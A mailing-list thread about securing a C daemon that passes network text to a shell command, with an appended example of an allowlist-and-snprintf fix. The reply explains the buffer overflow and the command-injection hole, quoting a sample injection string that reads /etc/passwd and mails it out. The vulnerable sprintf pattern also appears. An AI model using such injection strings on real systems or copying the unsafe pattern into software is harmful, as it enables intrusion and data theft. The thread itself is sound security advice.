Re: SOLVED: Daemon Programming
Yep, that's a good point, that I haven't realized. The security stuff is
very very important.
I have to change the code to be able to manage these problems. This is
the next step.
Thanks for your advice ;-)
Sergio Cuellar Valdes
On Fri, 14 Jan 2005 03:58:44 +0000, Steve Kemp <email@example.com> wrote:
> On Thu, Jan 13, 2005 at 09:41:29PM -0600, Sergio Cuéllar Valdés wrote:
> > Marc, thanks that was the problem !!!
> > sprintf(message, "say -s 4 -a \"%s\"", buffer); < this was the big
> > big big mistake
> It certainly was.
> > I added the whole path to the instructions:
> > sprintf(message, "/usr/local/bin/say -s 4 -a \"%s\"", buffer);
> > Thanks to all of you who helped me !! :-)
> You daemonize. You open a socket. You read input from that
> socket - carefully avoiding buffer overflows - then you run the
> /usr/local/bin/say -s 4 -a "the text you read"
> Firstly you don't avoid a simple buffer overflow. Although
> you have two buffers, 'buffer' for receiving the message from
> the network and 'message' for running the command are both the
> same size you don't account for the extra characters when you're
> sprintf(message, "say -s 4 -a \"%s\"", buffer);
> At least change that to:
> snprintf(message, sizeof(message), "say -s 4 -a \"%s\"", buffer);
> Secondly, and this is the biggie, you don't quote or process the
> characters which are read from the network.
> Consider what would happen if a malicious user sent this:
> "; cat /etc/passwd | mail firstname.lastname@example.org ; echo "
> You would run this command:
> /usr/local/bin/say -s 4 -a ""; cat /etc/passwd | mail ... ; echo ""
> Effectively you're allowing any user who can connect to your server
> to execute arbitrary commands. If this is started by init you're likely
> running as root too.
> Check that the characters you read from the network are only
> [a-zA-Z ] and you're probably OK.
> # The Debian Security Audit Project.
"My hope shall guide me
Through the days without you
And love shall carry me
When the pain breaks hope"
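
Added example, not part of the original messages or the poster's daemon: the two fixes suggested in the quoted reply combined, a strict [a-zA-Z ] allowlist applied before the command string is built, and an snprintf whose return value is checked for truncation. The function names, return codes and sample inputs are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define SAY_PATH "/usr/local/bin/say"   /* full path as given in the thread */

/* Return 1 if text is non-empty and contains only [a-zA-Z ], else 0.
 * Explicit ASCII ranges are used so the result does not depend on locale. */
int is_allowed_text(const char *text)
{
    size_t i;
    if (text == NULL || text[0] == '\0')
        return 0;
    for (i = 0; text[i] != '\0'; i++) {
        char c = text[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || c == ' '))
            return 0;
    }
    return 1;
}

/* Build the command line into out (hypothetical helper).
 * Returns 0 on success, -1 if the text is rejected, -2 if it would not fit.
 * On any failure out is left as an empty string so it cannot be run by mistake. */
int build_say_command(char *out, size_t outlen, const char *text)
{
    int n;
    if (out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (!is_allowed_text(text))
        return -1;
    n = snprintf(out, outlen, SAY_PATH " -s 4 -a \"%s\"", text);
    if (n < 0 || (size_t)n >= outlen) {   /* output was truncated */
        out[0] = '\0';
        return -2;
    }
    return 0;
}

int main(void)
{
    /* Constructed inputs: one benign, one shaped like the string in the thread. */
    const char *samples[] = { "hello world", "\"; cat /etc/passwd ; echo \"" };
    char message[64];
    size_t i;
    for (i = 0; i < sizeof(samples) / sizeof(samples[0]); i++)
        printf("rc=%d cmd=[%s]\n",
               build_say_command(message, sizeof(message), samples[i]), message);
    return 0;
}
```

Because the allowlist also rejects newline characters, a caller that reads lines from the socket has to strip the trailing line terminator before calling build_say_command.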